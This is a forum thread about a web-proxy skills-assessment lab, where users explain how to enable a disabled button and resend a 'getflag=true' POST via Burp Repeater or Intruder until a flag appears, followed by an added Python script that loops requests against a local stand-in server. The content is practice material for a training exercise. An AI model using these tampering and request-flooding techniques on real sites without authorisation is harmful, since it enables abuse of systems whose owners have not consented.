Skills Assessment - Using Web Proxies First Question

Hello,
I’m doing the Web Proxies skills assessment and I’m stuck at the first question:
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

I’ve tried to match and replace the response in Burp, replacing the ‘disabled’ by ‘enabled’. It seems to work when I click on the button now but it gives me a blank screen every time.

The hint says the button doesn’t give the flag every time but I don’t know what else I can do to be able to click it many times. Can anyone maybe give me a hint here?

It’s been a while since I have done that question, but I am pretty sure you should keep trying the button.

I think I enabled the button, then captured the request and sent it to the repeater. Try out the repeater, it is easier to see the results.

Good luck,
-onthesauce

1 Like

Do you enable the button via the request or the response?

Because when I change ‘disabled’ to ‘enabled’ with the replace rule in the response body, it seems to work but I keep getting the blank screen. Or, the closest I think I’ve come to it is a GET success.txt but the word ‘success’ is not the flag.

Steer away from the replace rule for this one. That might be over complicating it.

In the options, just check the box to have the proxy display responses. Modify it once there. Then press the button and do what I mentioned above.

DM me if you still have trouble.
-onthesauce

Got it. I had to try more times than I expected. I probably just wasn’t patient enough.

Nice, glad to hear it. Patience is definitely needed with some of these modules.

Using the embedded Burp Browser, I changed “disabled” to “enabled” in Developer Tools while capturing the traffic in Burp. Clicked on the button again in the Burp Browser. Then I sent the new request to Repeater. You should see “getflag=true” in the request. If not, you’re doing something wrong. Then I kept sending the request, maybe 5-10 times. Eventually the flag was included in the response. I think that’s part of the theme of:

I'm feeling lucky!

John

First, using the Burp browser, you navigate to XXX/lucky.php and forward it.
Second, in the browser, you press F12 (DevTools) and switch from “disable” to “enable”.
Third, then you press the flag button.
Fourth, you capture it and send it to Repeater, it should show up in the Request as getflag=true.
Fifth, you forward it several times until the flag appears in the response

1 Like

Keep an eye on content length size; it should tell you which response has the flag.
The question primarily tests whether or not you can apply the “Repeater” feature effectively.

  1. intercepted the request
  2. intercepted the response, removed disabled
  3. sent the request again, now getflag=true shows up in the body
  4. sent to Repeater
  5. repeated a couple of times, nothing

Couldn’t get what I was doing wrong. Happens that I had to call the Repeater 38 times before the flag showed. Thought that was insane. Tried again, it appeared after 48 times. This is massive bs.

1 Like

You need to enable the disabled form by using the Match and Replace rules. Once the form is enabled, hit the button and you should see a POST request to /lucky.php. Now you have two options:

  1. Send to Repeater and hit the Send button patiently, or
  2. Use Intruder and let Burp do the job for you.

I used #2. I added an arbitrary header and the value is a pointer which increases from 1 to 1000. You should notice the response size of the request - there is only one being bigger than the rest because that contains a flag.

Here is a link to zap fuzzer alternative if anyone needs one!

One more hint that worked for me…

If you don’t find a solution in the Burp repeater, use a bash script that sends 100 POST requests and finds that flag.
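Added example, not from any poster in this thread: a small Python script that does what the Intruder, "keep an eye on content length" and bash-loop posts above describe by hand. It repeats the POST with getflag=true a fixed number of times and picks out the response whose body length differs from the most common one. So that it runs offline, it starts a stand-in HTTP server in a thread that imitates the behaviour described for /lucky.php (a longer body on a random subset of requests); that server, the X-Attempt header name and the FLAG{constructed-placeholder} value are assumptions made here, not the lab's real endpoint or flag. To use it against the actual lab page, replace lucky_url with that page's URL and drop the stand-in server.

```python
"""Repeat a POST and spot the one response that differs in length.

Added example, not code from the thread or the lab. The stand-in server
below is constructed to behave like the described /lucky.php; the real
endpoint, header name and flag value are assumptions.
"""
import random
import threading
import urllib.parse
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer


# --- constructed stand-in for the lab endpoint (not the real /lucky.php) ---
class _LuckyHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        body = b"<p>Try again</p>"
        # Roughly one in ten requests carrying getflag=true gets a longer
        # body containing the (placeholder) flag, mirroring the "lucky" theme.
        if form.get("getflag") == ["true"] and random.random() < 0.1:
            body = b"<p>Try again</p><p>FLAG{constructed-placeholder}</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_stand_in_server():
    """Bind the stand-in on a free loopback port; return (server, url)."""
    server = HTTPServer(("127.0.0.1", 0), _LuckyHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}/lucky.php"


# --- the part that mirrors the Repeater / Intruder / bash-loop approach ---
def send_once(url, index):
    """One POST with getflag=true; returns the raw response body."""
    data = urllib.parse.urlencode({"getflag": "true"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    # Same trick as the Intruder post: a throwaway header carrying the
    # attempt number (X-Attempt is an assumed name) so each request is
    # distinguishable in a proxy's history.
    req.add_header("X-Attempt", str(index))
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read()


def find_length_outliers(bodies):
    """Return (index, body) pairs whose length differs from the most common
    length: the same check as watching the Content-Length column."""
    common_len = Counter(len(b) for b in bodies).most_common(1)[0][0]
    return [(i, b) for i, b in enumerate(bodies) if len(b) != common_len]


def hunt_flag(url, attempts=100):
    """Send `attempts` requests and return the length outliers among them."""
    bodies = [send_once(url, i) for i in range(attempts)]
    return find_length_outliers(bodies)


if __name__ == "__main__":
    server, lucky_url = start_stand_in_server()
    try:
        for i, body in hunt_flag(lucky_url):
            print(f"attempt {i}: {len(body)} bytes -> {body.decode()}")
    finally:
        server.shutdown()
```

The outlier test uses the most common length rather than a fixed expected size, so it still works when you do not know in advance how long the "no flag" page is; if every response has the same length, it returns an empty list and you simply run more attempts, which is what the 38-and-48-tries post above ran into.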